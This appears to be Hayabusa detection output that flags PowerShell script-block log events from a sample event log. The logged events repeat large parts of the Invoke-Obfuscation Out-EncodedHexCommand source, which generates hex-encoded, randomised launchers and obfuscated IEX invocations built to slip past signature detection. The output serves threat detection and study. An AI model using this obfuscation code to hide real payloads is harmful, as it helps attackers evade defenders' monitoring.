* ' "" [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax. $RandomDelimiters = @('_','-',',','{','}','~','!','@','%','&','<','>',';',':') # Add letters g-z with random case to $RandomDelimiters (avoiding a-f as it will be used for Hexadecimal values). @('g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') | ForEach-Object {$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar} # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. $RandomDelimiters = (Get-Random -Input $RandomDelimiters -Count ($RandomDelimiters.Count/4)) # Convert $ScriptString to delimited Hex values in [Char] array separated by random delimiter from defined list $RandomDelimiters. $DelimitedEncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$DelimitedEncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + (Get-Random -Input $RandomDelimiters))} # Remove trailing delimiter from $DelimitedEncodedArray. $DelimitedEncodedArray = $DelimitedEncodedArray.SubString(0,$DelimitedEncodedArray.Length-1) # Create printable version of $RandomDelimiters in random order to be used by final command. $RandomDelimitersToPrint = (Get-Random -Input $RandomDelimiters -Count $RandomDelimiters.Length) -Join '' # Generate random case versions for necessary operations. 
$ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ToInt16 = ([Char[]]'[Convert]::ToInt16(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax. $RandomDelimitersToPrintForDashSplit = '' ForEach($RandomDelimiter in $RandomDelimiters) { # Random case 'split' string. $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += ('-' + $Split + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1))) } $RandomDelimitersToPrintForDashSplit = $RandomDelimitersToPrintForDashSplit.Trim() # Randomly select between various conversion syntax options. 
$RandomStringSyntax = ([Char[]](Get-Random -Input @('[String]$_','$_.ToString()')) | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomConversionSyntax = @() $RandomConversionSyntax += ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' $RandomConversionSyntax += $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input @('-as','-As','-aS','-AS')) + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"" $RandomConversionSyntax = (Get-Random -Input $RandomConversionSyntax) # Create array syntax for encoded $ScriptString as alternative to .Split/-Split syntax. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object { # Encapsulate current item with single quote if it contains a non-integer. If([Convert]::ToString(([Int][Char]$_),$EncodingBase).Trim('0123456789').Length -gt 0) {$Quote = ""'""} Else {$Quote = ''} $EncodedArray += ($Quote + [Convert]::ToString(([Int][Char]$_),$EncodingBase) + $Quote + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1))) } # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. 
# If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate the code that will decrypt and execute the payload and randomly select one. 
$BaseScriptArray = @() $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'."" + $Split + ""("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimitersToPrint + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'"" + ' '*(Get-Random -Input @(0,1)) + $RandomDelimitersToPrintForDashSplit + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' # Generate random JOIN syntax for all above options. 
$NewScriptArray = @() $NewScriptArray += (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray += $Join + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) $NewScriptArray += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script w",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.258 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.258 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. 
# # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedHexCommand { <# .SYNOPSIS Generates hexadecimal encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedHexCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedHexCommand encodes an input PowerShell scriptblock or path as a hexadecimal payload. It randomly chooses between .Split/-Split/array syntax to store the encoded payload in the final output. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. 
.PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedHexCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NonInt -NoPr ""('57_72}69R74u65P2dR48T6fu73_74;20_27R48T65R6cR6c;6fT20;57}6fP72}6cT64u21;27}20}2dP46T6f}72u65{67T72}6f_75}6e{64P43_6f_6cR6f{72u20;47T72{65T65}6eT3b}20T57_72P69u74u65P2dT48T6fR73;74;20P27T4fu62;66P75{73R63}61}74{69R6fu6eT20T52u6fT63u6b;73u21;27}20;2d;46R6fT72T65P67P72R6fP75{6e}64T43_6fP6cR6f{72;20T47T72T65{65}6e'-SPLiT'P'-SpliT'}'-SPLIt 'u'-SpLIt'{'-SPLit'R' -SplIT '_'-SpliT'T' -SplIt';'| ForEach-Object { ([Convert]::ToInt16(( $_.ToString()),16)-AS[Char]) }) -Join ''|Invoke-Expression"" C:\PS> Out-EncodedHexCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} -NoProfile -NonInteractive -PassThru -Join (( 57,72 , 69 , 74 , 65, '2d', 48, '6f', 73 ,74, 20, 27 ,48, 65, '6c', '6c','6f', 20,57 , '6f',72,'6c' , 64 ,21 , 27 , 20 ,'2d', 46,'6f', 72 ,65 ,67, 72, '6f', 75 ,'6e', 64 ,43,'6f' , '6c' ,'6f' , 72,20 ,47 , 72 , 65, 65,'6e','3b', 20, 57 ,72,69 ,74 ,65,'2d',48 ,'6f' ,73, 74 ,20 , 27,'4f' ,62, 66,75 , 73 ,63 ,61 ,74 , 69 , '6f' , '6e', 20,52 , '6f',63 , '6b' , 73,21,27 , 20, '2d' ,46 ,'6f', 72,65 ,67, 72 ,'6f' ,75 ,'6e' , 64 , 43,'6f' ,'6c' , '6f' , 72 ,20, 47,72,65 , 65, '6e') |ForEach-Object{ ([Char]([Convert]::ToInt16( ([String]$_) ,16))) })|IEX .NOTES Inspiration for this encoding technique came from: https://blogs.technet.microsoft.com/heyscriptingguy/2011/09/09/convert-hexadecimal-to-ascii-using-powershell/ This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Encoding base values: 16=Hex, 8=Octal, 2=Binary $EncodingBase = 16 # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Create list of random delimiters $RandomDelimiters. # Avoid using . 
* ' "" [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax. $RandomDelimiters = @('_','-',',','{','}','~','!','@','%','&','<','>',';',':') # Add letters g-z with random case to $RandomDelimiters (avoiding a-f as it will be used for Hexadecimal values). @('g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') | ForEach-Object {$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar} # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. $RandomDelimiters = (Get-Random -Input $RandomDelimiters -Count ($RandomDelimiters.Count/4)) # Convert $ScriptString to delimited Hex values in [Char] array separated by random delimiter from defined list $RandomDelimiters. $DelimitedEncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$DelimitedEncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + (Get-Random -Input $RandomDelimiters))} # Remove trailing delimiter from $DelimitedEncodedArray. $DelimitedEncodedArray = $DelimitedEncodedArray.SubString(0,$DelimitedEncodedArray.Length-1) # Create printable version of $RandomDelimiters in random order to be used by final command. $RandomDelimitersToPrint = (Get-Random -Input $RandomDelimiters -Count $RandomDelimiters.Length) -Join '' # Generate random case versions for necessary operations. 
$ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ToInt16 = ([Char[]]'[Convert]::ToInt16(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax. $RandomDelimitersToPrintForDashSplit = '' ForEach($RandomDelimiter in $RandomDelimiters) { # Random case 'split' string. $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += ('-' + $Split + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1))) } $RandomDelimitersToPrintForDashSplit = $RandomDelimitersToPrintForDashSplit.Trim() # Randomly select between various conversion syntax options. 
$RandomStringSyntax = ([Char[]](Get-Random -Input @('[String]$_','$_.ToString()')) | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomConversionSyntax = @() $RandomConversionSyntax += ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' $RandomConversionSyntax += $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input @('-as','-As','-aS','-AS')) + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"" $RandomConversionSyntax = (Get-Random -Input $RandomConversionSyntax) # Create array syntax for encoded $ScriptString as alternative to .Split/-Split syntax. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object { # Encapsulate current item with single quote if it contains a non-integer. If([Convert]::ToString(([Int][Char]$_),$EncodingBase).Trim('0123456789').Length -gt 0) {$Quote = ""'""} Else {$Quote = ''} $EncodedArray += ($Quote + [Convert]::ToString(([Int][Char]$_),$EncodingBase) + $Quote + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1))) } # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. 
# If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate the code that will decrypt and execute the payload and randomly select one. 
$BaseScriptArray = @() $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'."" + $Split + ""("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimitersToPrint + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'"" + ' '*(Get-Random -Input @(0,1)) + $RandomDelimitersToPrintForDashSplit + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' # Generate random JOIN syntax for all above options. 
$NewScriptArray = @() $NewScriptArray += (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray += $Join + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) $NewScriptArray += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script w",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.258 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"ithout dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. 
# These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. 
$InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. 
